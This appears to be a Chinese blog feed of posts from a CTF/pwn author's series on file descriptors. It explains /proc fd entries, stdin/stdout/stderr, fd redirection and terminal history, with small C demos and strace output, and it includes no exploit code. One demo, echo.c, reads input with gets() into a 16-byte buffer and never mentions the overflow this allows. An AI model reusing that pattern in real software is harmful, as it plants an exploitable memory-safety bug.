class="p">:</span> <span class="bp">self</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;Interrupted&#39;</span><span class="p">)</span> <span class="n">go</span><span class="o">.</span><span class="n">set</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p><code>interactive()</code> 时程序试图从 1 读取内容，但此时只有 0，于是就触发了异常；但使用 <code>pwnlib.remote</code> 时是直接建立了一个 socket，因此不会触发异常（具体可以分析源码）</p> <p>还要注意的是，当使用 <code>socat</code>，<code>xinted</code> 等挂载题目时，0, 1, 2 实际上已经不是 <code>stdin, stdout, stderr</code> 而是 socket 了，但因为端口转发的原因我们可以认为仍然是 <code>stdin, stdout, stderr</code>，这也提醒我们遇到和 fd 有关的题目时，可以本地挂载然后使用 <code>pwnlib.remote</code> 测试以减少不必要的麻烦。</p> <h2 id="references">References</h2> <p><a href="https://lordidiot.github.io/2018-09-03/tokyowesterns-ctf-2018-load-pwn/">https://lordidiot.github.io/2018-09-03/tokyowesterns-ctf-2018-load-pwn/</a></p> <p><a href="http://nano-chicken.blogspot.com/2014/07/linuxttyptypts.html">http://nano-chicken.blogspot.com/2014/07/linuxttyptypts.html</a></p> <p><a href="https://segmentfault.com/a/1190000009082089">https://segmentfault.com/a/1190000009082089</a></p> <p><a href="http://shell-storm.org/shellcode/files/shellcode-219.php">http://shell-storm.org/shellcode/files/shellcode-219.php</a></p> <p><a href="http://tacxingxing.com/2018/01/19/procfs/">http://tacxingxing.com/2018/01/19/procfs/</a></p> <p><a href="https://tdmathison.github.io/blog/slae32-1/">https://tdmathison.github.io/blog/slae32-1/</a></p> <p><a href="https://tdmathison.github.io/blog/slae32-2/">https://tdmathison.github.io/blog/slae32-2/</a></p> <p><a href="https://xz.aliyun.com/t/2548">https://xz.aliyun.com/t/2548</a></p> <p><a href="https://xz.aliyun.com/t/2549">https://xz.aliyun.com/t/2549</a></p> https://bash-c.github.io/post/play-with-file-descriptor-2/ Tue, 11 Sep 2018 20:46:54 +0800 https://bash-c.github.io/post/play-with-file-descriptor-2/ <p>这一篇主要介绍一些文件描述符的内容。 同样参考了很多，链接都放在 reference 了。</p> <h2 id="什么是文件">什么是文件</h2> <p>上一篇提到了 *nix 的一个哲学思想 <code>一切皆文件</code>，我们可以与 windows 做一个对比。</p> <ul> <li>在 windows 中是文件的东西，在 *nix 中也是文件；</li> <li>在 windows 中不是文件的东西，如<strong>进程，磁盘等</strong>也被抽象成了文件，可以使用访问文件的方法访问它们；</li> <li>其次，一些更抽象的东西，比如管道（pipe），/dev/zero (一个可以读出无限个 0 的文件)，/dev/null（一个黑洞一样丢弃一切写入其中数据的文件），/dev/urandom（一个产生随机数据的文件）也是文件</li> <li>再其次，类似 socket 通信这些东西也是文件</li> </ul> <p>这样抽象的好处是<strong>提供了操作的一致性</strong>。几乎所有的读取（读文件，读系统状态，读 socket，读 PIPE），都可以用 read 函数进行；几乎所有的更改（写文件，更改系统参数，写 socket，写 PIPE），都可以使用 write 函数进行。所有的操作都统一，对于程序员而言是一件多么美好的事情。</p> <blockquote> <p>举一个直观的例子，在较老的 linux 中，使用 <strong>cat /dev/urandom &gt; /dev/dsp</strong> 可以使扬声器产生随机噪声</p> </blockquote> <h2 id="什么是文件描述符">什么是文件描述符</h2> <p>在 *nix 系统中，当进程打开现有文件或创建新文件 (open) 时，内核向进程返回一个 <strong>文件描述符（file descriptor）</strong>。在形式上是一个非负整数，作为一个索引指向被打开的文件，所有执行 I/O 操作的系统调用都会通过文件描述符。</p> <p>我们用下边的代码解释这个概念</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="c1">// gcc file_descriptor.c -o file_decsriptor </span><span class="c1"></span><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp"> </span><span class="cp"></span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">getchar</span><span class="p">();</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Open a file.&#34;</span><span class="p">);</span> <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">getchar</span><span class="p">();</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Close the file.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span> <span class="n">getchar</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>编译运行，一个进程就被建立起来了，我们可以在 /proc/[PID] 目录下查看这个进程的信息（这个机制与 linux 的 procfs 有关，不做过多介绍）。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ./file_descriptor .... others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> pgrep file_descriptor <span class="m">468</span> others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ls /proc/468 attr cwd map_files oom_adj schedstat syscall autogroup environ maps oom_score sessionid task auxv exe mem oom_score_adj setgroups timers cgroup fd mountinfo pagemap smaps timerslack_ns clear_refs fdinfo mounts patch_state smaps_rollup uid_map cmdline gid_map mountstats personality stack wchan comm io net projid_map stat coredump_filter limits ns root statm cpuset loginuid numa_maps sched status </code></pre></td></tr></table> </div> </div><p>比如 /proc/[PID]/maps 存储了该进程的内存布局，/proc/[PID]/environ 存储了该进程的环境变量，还有很多有趣的文件，就不一一介绍了。</p> <p>本篇主要讲的是 fd(file descriptor)，因此我们直奔主题，查看 /proc/[PID]/fd 下有什么</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ls /proc/468/fd <span class="m">0</span> <span class="m">1</span> <span class="m">2</span> </code></pre></td></tr></table> </div> </div><p>可以看到该进程已经有了三个 fd， 至于这三个 fd 是什么我们待会再谈，继续运行程序</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ./file_descriptor Open a file. .... others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ls /proc/468/fd <span class="m">0</span> <span class="m">1</span> <span class="m">2</span> <span class="m">3</span> others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> file /proc/468/fd/3 /proc/468/fd/3: symbolic link to /dev/urandom </code></pre></td></tr></table> </div> </div><p>可以看到，当该进程新打开了一个文件时，/proc/[PID]/fd 中多了一个文件描述符，并且该文件描述符指向我们打开的文件 /dev/urandom。</p> <p>继续运行</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ./file_descriptor ： Open a file. Close the file. .... others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ls /proc/468/fd <span class="m">0</span> <span class="m">1</span> <span class="m">2</span> </code></pre></td></tr></table> </div> </div><p>此时进程关闭了 /dev/urandom 这个文件，3 号文件描述符也就消失了。 如果在程序关闭前，有对该文件进行 IO，那么这些操作都将通过这个文件描述符。</p> <h2 id="stdin-stdout-和-stderr">stdin, stdout 和 stderr</h2> <p>我们再写一个简单的程序</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="c1">// gcc echo.c -o echo </span><span class="c1"></span><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp"></span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x10</span><span class="p">];</span> <span class="n">gets</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>编译生成可执行文件，使用 strace 观察它在运行过程中的系统调用</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> strace ./echo execve<span class="o">(</span><span class="s2">&#34;./echo&#34;</span>, <span class="o">[</span><span class="s2">&#34;./echo&#34;</span><span class="o">]</span>, 0x7fff39984720 /* <span class="m">52</span> vars */<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> ...... read<span class="o">(</span>0, </code></pre></td></tr></table> </div> </div><p>忽略程序装载时的一些系统调用，程序停在了 <strong>read(0,</strong> 这里等待我们的输入，也就是说 gets 这个库函数实际上使用了read 这个系统调用，传入一些输入继续观察</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> strace ./echo execve<span class="o">(</span><span class="s2">&#34;./echo&#34;</span>, <span class="o">[</span><span class="s2">&#34;./echo&#34;</span><span class="o">]</span>, 0x7ffdc5b21cb0 /* <span class="m">52</span> vars */<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> ...... read<span class="o">(</span>0, <span class="m">12345678</span> <span class="s2">&#34;12345678\n&#34;</span>, 1024<span class="o">)</span> <span class="o">=</span> <span class="m">9</span> ...... write<span class="o">(</span>1, <span class="s2">&#34;12345678\n&#34;</span>, <span class="m">912345678</span> <span class="o">)</span> <span class="o">=</span> <span class="m">9</span> exit_group<span class="o">(</span>0<span class="o">)</span> <span class="o">=</span> ? +++ exited with <span class="m">0</span> +++ </code></pre></td></tr></table> </div> </div><p>这说明 puts 实际上使用了 write 这个系统调用，使用 <code>man 3 read</code> 和 <code>man 3 write</code> 查看 read 和 write 的用户手册，可以发现如下的描述</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">NAME pread, read — read from a file SYNOPSIS #include &lt;unistd.h&gt; ssize_t pread(int fildes, void *buf, size_t nbyte, off_t offset); ssize_t read(int fildes, void *buf, size_t nbyte); DESCRIPTION The read() function shall attempt to read nbyte bytes from the file associated with the open file descriptor, fildes, into the buffer pointed to by buf. The behavior of multiple concurrent reads on the same pipe, FIFO, or terminal device is unspecified. ...... NAME pwrite, write — write on a file SYNOPSIS #include &lt;unistd.h&gt; ssize_t pwrite(int fildes, const void *buf, size_t nbyte, off_t offset); ssize_t write(int fildes, const void *buf, size_t nbyte); DESCRIPTION The write() function shall attempt to write nbyte bytes from the buffer pointed to by buf to the file associated with the open file descriptor, fildes. </code></pre></td></tr></table> </div> </div><p>圈一下重点</p> <blockquote> <p><strong>read attempt to read bytes from the file associated with the open file descriptor;</strong></p> </blockquote> <blockquote> <p><strong>write attempt to write bytes to the file associated with the open file descriptor</strong></p> </blockquote> <p>read 和 write 这两个系统调用一个从文件读取内容，一个把内容写到文件里。 更具体的，这个进程运行时，read 是从 0 这个文件读取内容，然后把内容写到了 1 这个文件里。 那么 0 和 1 ，以及刚刚提到的 2 这个文件又是什么？</p> <p>这个答案很容易搜索到：0，1 和 2 分别为 stdin，stdout 和 stderr。<code>man stdin</code> 查看一下对应的用户手册，圈出重点</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> Under normal circumstances every UNIX program has three streams opened for it when it starts up, one for input, one for output, and one for printing diagnostic or error messages. The input stream is referred to as &#34;standard input&#34;; the output stream is referred to as &#34;standard output&#34;; and the error stream is referred to as &#34;standard error&#34;. These terms are abbreviated to form the symbols used to refer to these files, namely stdin, stdout, and stderr. </code></pre></td></tr></table> </div> </div><p>每个程序在运行时会自动打开三个文件 stdin，stdout 和 stderr，文件描述符为0,1,2，分别代表标准输入，标准输出和标准错误；</p> <p>之后打开的文件会从 3 继续向后递增，新打开文件 (open) 时，将返回所能允许的最小文件描述符。</p> <p>同时从 stdin 的用户手册里还可以发现 stderr 默认是无缓冲，stdout 默认是行缓冲，stdin 默认是全缓冲，可以通过 setbuf， setvbuf 等函数改变这些属性（关于 io 缓冲的更多知识可以参考这篇<a href="https://blog.csdn.net/K346K346/article/details/63259524">文章</a>）</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">NOTES The stream stderr is unbuffered. The stream stdout is line-buffered when it points to a terminal. Partial lines will not appear until fflush(3) or exit(3) is called, or a newline is printed. This can produce unexpected results, espe‐ cially with debugging output. The buffering mode of the standard streams (or any other stream) can be changed using the setbuf(3) or setvbuf(3) call. Note that in case stdin is associated with a terminal, there may also be input buffering in the terminal driver, entirely unrelated to stdio buffering. (Indeed, normally terminal input is line buffered in the kernel.) This kernel input handling can be modified using calls like tcsetattr(3); see also stty(1), and termios(3). </code></pre></td></tr></table> </div> </div><h2 id="play-with-file-decsriptors">Play with file decsriptors</h2> <p>有了以上的概念，我们来看一下下边的代码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">others_reverse_shell</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">bat</span> <span class="n">play_with_fd</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┬─────────────────────────────────────────────────────────────────────────────────</span> <span class="err">│</span> <span class="nl">File</span><span class="p">:</span> <span class="n">play_with_fd</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┼─────────────────────────────────────────────────────────────────────────────────</span> <span class="mi">1</span> <span class="err">│</span> <span class="c1">// gcc play_with_fd.c -o play_with_fd </span><span class="c1"></span> <span class="mi">2</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdio</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">3</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">fcntl</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">4</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">unistd</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">5</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">sys</span><span class="o">/</span><span class="n">stat</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">6</span> <span class="err">│</span> <span class="mi">7</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">main</span><span class="p">()</span> <span class="mi">8</span> <span class="err">│</span> <span class="p">{</span> <span class="mi">9</span> <span class="err">│</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Now stdout is on.&#34;</span><span class="p">);</span> <span class="mi">10</span> <span class="err">│</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;And then we close stdout.&#34;</span><span class="p">);</span> <span class="mi">11</span> <span class="err">│</span> <span class="mi">12</span> <span class="err">│</span> <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="mi">13</span> <span class="err">│</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;dumb output because stdout is closed.&#34;</span><span class="p">);</span> <span class="mi">14</span> <span class="err">│</span> <span class="mi">15</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;output.txt&#34;</span><span class="p">,</span> <span class="n">O_RDWR</span> <span class="o">|</span> <span class="n">O_CREAT</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span> <span class="mi">16</span> <span class="err">│</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Since open() returns 1 and puts() triggers write(1,....), this message wi</span> <span class="err">│</span> <span class="n">ll</span> <span class="n">be</span> <span class="n">written</span> <span class="n">to</span> <span class="n">the</span> <span class="n">file</span> <span class="n">output</span><span class="p">.</span><span class="n">txt</span><span class="s">&#34;);</span> <span class="mi">17</span> <span class="err">│</span> <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span> <span class="c1">// don&#39;t forget to close(fd)!!! </span><span class="c1"></span> <span class="mi">18</span> <span class="err">│</span> <span class="mi">19</span> <span class="err">│</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="mi">20</span> <span class="err">│</span> <span class="p">}</span> <span class="err">───────┴─────────────────────────────────────────────────────────────────────────────────</span> </code></pre></td></tr></table> </div> </div><p>编译运行，得到如下结果</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> ./play_with_fd Now stdout is on. And <span class="k">then</span> we close stdout. others_reverse_shell <span class="o">[</span>master●●<span class="o">]</span> cat output.txt Since open<span class="o">()</span> returns <span class="m">1</span> and puts<span class="o">()</span> triggers write<span class="o">(</span>1,....<span class="o">)</span>, this message will be written to the file output.txt </code></pre></td></tr></table> </div> </div><ul> <li> <p>13 行的输出并没有向往常一样显示在显示屏上，因为 stdout 在 12 行已经被关闭了；</p> </li> <li> <p>16 行的信息输出到了 output.txt 中，这是因为 15 行执行时，这个进程有 0 和 2 两个 fd，因此 open 返回所能允许的最小文件描述符 1，而 puts 实际是系统调用 write(1, &hellip;.)，因此这条消息就被写到了 1 （此时为打开的 output.txt）这个文件中；</p> </li> <li> <p>同理，我们还可以通过 close(0)，close(1) 等操作控制进程从其他文件（包括其他进程，socket，pipe 等）进行 io。</p> </li> </ul> <p>值得一提的记得 17 行的 close(fd) 的操作，这是因为每个用户和每个进程所能承受的 fd 是有限的，进程的可以通过 /proc/[PID]/limits 查看，用户可以通过 <code>ulimit -a</code> 查看</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">post <span class="nb">ulimit</span> -a -t: cpu <span class="nb">time</span> <span class="o">(</span>seconds<span class="o">)</span> unlimited -f: file size <span class="o">(</span>blocks<span class="o">)</span> unlimited -d: data seg size <span class="o">(</span>kbytes<span class="o">)</span> unlimited -s: stack size <span class="o">(</span>kbytes<span class="o">)</span> <span class="m">8192</span> -c: core file size <span class="o">(</span>blocks<span class="o">)</span> <span class="m">0</span> -m: resident <span class="nb">set</span> size <span class="o">(</span>kbytes<span class="o">)</span> unlimited -u: processes <span class="m">30645</span> -n: file descriptors <span class="m">1024</span> &lt;- max -l: locked-in-memory size <span class="o">(</span>kbytes<span class="o">)</span> <span class="m">16384</span> -v: address space <span class="o">(</span>kbytes<span class="o">)</span> unlimited -x: file locks unlimited -i: pending signals <span class="m">30645</span> -q: bytes in POSIX msg queues <span class="m">819200</span> -e: max nice <span class="m">0</span> -r: max rt priority <span class="m">0</span> -N 15: unlimited </code></pre></td></tr></table> </div> </div><p>比如我的环境下我最多能同时打开 1024 个文件，如果大于这个数值，会造成文件打开失败，后续的从文件 io 等操作全部失效。</p> <blockquote> <p>至于更多的 fd tricks，在下一篇我将会从几道 pwnable 题目入手逐步介绍</p> </blockquote> <h2 id="references">References</h2> <p>Linux Programmer&rsquo;s Manual</p> <p><a href="http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html">http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html</a></p> <p><a href="https://zh.wikipedia.org/wiki/">https://zh.wikipedia.org/wiki/</a>文件描述符 <a href="https://www.zhihu.com/question/25696682">https://www.zhihu.com/question/25696682</a> <a href="https://www.zhihu.com/question/30420304">https://www.zhihu.com/question/30420304</a></p> https://bash-c.github.io/post/play-with-file-descriptor-1/ Mon, 10 Sep 2018 23:17:33 +0800 https://bash-c.github.io/post/play-with-file-descriptor-1/ <p>本来只是想记录一下 reverse shell 的一些东西，结果越学越觉得什么都不懂，索性深入研究了一下从底层讲一讲 pwnable 中的 fd tricks，预计共分三篇完成。</p> <p>第一篇主要区分一些设备上容易混淆的概念，和 fd 关系并不大，但是很有意思。参考了很多，链接都放在最后了。</p> <p>(这篇 post 基本是搬运了参考链接- -感谢大佬们的无私分享)</p> <h2 id="什么是-cli">什么是 CLI</h2> <p><img src="http://photo.orsoon.com/171201/Hacker_at_work/RVjaq0ElzR.jpg" alt=""> <strong>Command-line Interface</strong> 即命令行界面，通俗的说就是黑客电影中满屏都是字符的界面，与 GUI（图形用户界面，<strong>Graphical User Interface</strong>）相对。CLI 具有高效率等优点，因此即使是图形化较完善的操作系统（如 Windows）中，也保留了 cmd.exe 和 powershell 等命令行的程序</p> <h2 id="什么是终端">什么是终端</h2> <p>在计算机领域，终端 (Terminal) 指的是一种<strong>将用户的输入传给计算机，并显示计算结果的机器</strong>，但要充分理解终端的话，需要我们回溯历史。</p> <h3 id="历史上的终端">历史上的终端</h3> <p>在计算机刚诞生的时代，巨大的计算机往往放置在一个单独的房间里，程序员在其他的房间里通过某些设备与计算机进行交互，这些设备就称为<strong>终端(Terminal)</strong>，也叫终端机。</p> <p><img src="https://c1.staticflickr.com/3/2392/2283401196_2345b6584b_b.jpg" alt=""> 早期的终端一般是一种叫做电传打字机（<strong>Teletype</strong>）的设备，原因很简单，*nix 系统作为一个多用户的系统，需要每个用户都有一个终端，而价格低廉的 Teletype 就成了最好的选择（为什么不用键盘和显示器？因为那个时代还没有独立的键盘和显示器）。</p> <p>这样，第一代程序员将这些打字机接到主机上，就实现了 *nix 的多用户交互，电传打字机也就成了第一个 Terminal 。</p> <h3 id="什么是控制台">什么是控制台</h3> <p>上边说到，历史上的终端是一种连接到计算机上方便用户输入输出的外设，但有一个终端与众不同，它是计算机的一个组成部分，与主机一体，这个特殊的终端就叫<strong>控制台（Console）</strong>。</p> <p>控制台，顾名思义是用来管理计算机的，只能给系统管理员用，具有比普通终端更大的权限，一台计算机一般只有一个控制台，但可以有很多个终端（如下图中左边的即为 console，右边的为 terminal） <img src="https://pic3.zhimg.com/80/4552f1d835d9d6f07222e45975d97933_hd.jpg" alt=""></p> <blockquote> <p>但需要注意的是，随着 PC 的普及，Console 与 Terminal 的概念已经逐渐模糊。当我们在管理系统时，他们是控制台；当做一般的工作时，他们是终端。我们既是一般用户，有事系统管理员</p> </blockquote> <blockquote> <p>因此，<strong>现在的 Console 和 Terminal 基本可以看作是同义词</strong></p> </blockquote> <h3 id="什么是终端模拟器">什么是终端模拟器</h3> <p>随着硬件的发展，我们现在已经很少见到专门的终端设备了，取而代之的是键盘（输入）和显示器（输出）。</p> <p>没了终端设备，为了与操作系统交互，就需要一个程序来处理键盘和显示器的动作，模拟传统终端的行为，这种程序就是<strong>终端模拟器（Terminal Emulator）</strong>（下图是我正在使用的 terminal emulator： deepin-terminal） <img src="http://ww1.sinaimg.cn/large/006AWYXBly1fv4wpt6p2dj311r0l94b2.jpg" alt=""></p> <p>Terminal Emulator 的工作流程如下：</p> <ol> <li>捕获键盘输入</li> <li>将输入的信号经过处理后传递给其他程序（程序会认为这是从一个真正的终端设备输入的）</li> <li>获得程序的输出结果</li> <li>调用图形接口，将输出结果渲染到显示器</li> </ol> <p>终端模拟器的种类有很多，举几个常见的例子：</p> <ul> <li>Linux: gnome-terminal, Konsole;</li> <li>macOS: Terminal.app, iTerm2;</li> <li>Windows: Win32 控制台</li> </ul> <blockquote> <p>同样，随着历史发展，现在当人们一般直接直接将终端模拟器称作终端</p> </blockquote> <h3 id="终端窗口与虚拟控制台">终端窗口与虚拟控制台</h3> <p>大部分终端模拟器都是在图形用户界面（GUI）中运行的，叫做<strong>终端窗口（Terminal Window）</strong>，如上图中的 deepin-terminal。</p> <p>但有一些终端模拟器比较特殊，如在 *nix 系统下，使用快捷键 